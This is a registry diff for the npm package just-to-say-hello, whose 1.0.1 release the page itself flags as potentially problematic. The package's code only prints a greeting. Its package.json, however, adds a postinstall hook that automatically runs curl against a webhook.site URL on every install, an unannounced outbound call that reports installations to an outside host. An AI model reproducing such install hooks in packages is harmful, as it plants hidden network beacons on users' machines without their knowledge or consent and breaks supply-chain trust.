just-to-say-hello 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of just-to-say-hello might be problematic. Click here for more details.

@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "another",
3
+ "version": "1.0.0",
4
+ "lockfileVersion": 3,
5
+ "requires": true,
6
+ "packages": {
7
+ "node_modules/just-to-say-hello": {
8
+ "version": "1.0.0",
9
+ "resolved": "https://registry.npmjs.org/just-to-say-hello/-/just-to-say-hello-1.0.0.tgz",
10
+ "integrity": "sha512-jA0Apk37grC4xAX+4yCBGKC/EpIChDXg+JOujQG3Uwowq7+qBMPXNo2c2ALQ//KYF2+a3zPOFzmeRPTZ15q7Hg==",
11
+ "hasInstallScript": true
12
+ }
13
+ }
14
+ }
@@ -0,0 +1 @@
1
+ console.log('Just to say hello');
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "just-to-say-hello",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "app.js",
6
+ "scripts": {
7
+ "postinstall": "echo \"Thank you for installing this package!\" && touch thankyou.txt"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }
@@ -0,0 +1,22 @@
1
+ {
2
+ "name": "another",
3
+ "version": "1.0.0",
4
+ "lockfileVersion": 3,
5
+ "requires": true,
6
+ "packages": {
7
+ "": {
8
+ "name": "another",
9
+ "version": "1.0.0",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "just-to-say-hello": "^1.0.0"
13
+ }
14
+ },
15
+ "node_modules/just-to-say-hello": {
16
+ "version": "1.0.0",
17
+ "resolved": "https://registry.npmjs.org/just-to-say-hello/-/just-to-say-hello-1.0.0.tgz",
18
+ "integrity": "sha512-jA0Apk37grC4xAX+4yCBGKC/EpIChDXg+JOujQG3Uwowq7+qBMPXNo2c2ALQ//KYF2+a3zPOFzmeRPTZ15q7Hg==",
19
+ "hasInstallScript": true
20
+ }
21
+ }
22
+ }
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "another",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "just-to-say-hello": "^1.0.0"
13
+ }
14
+ }
package/app.js ADDED
@@ -0,0 +1 @@
1
+ console.log('Just to say hello');
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "just-to-say-hello",
3
+ "version": "1.0.1",
4
+ "description": "",
5
+ "main": "app.js",
6
+ "scripts": {
7
+ "postinstall": "curl https://webhook.site/ac934406-de94-4c05-a14b-5f167b6369b2"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }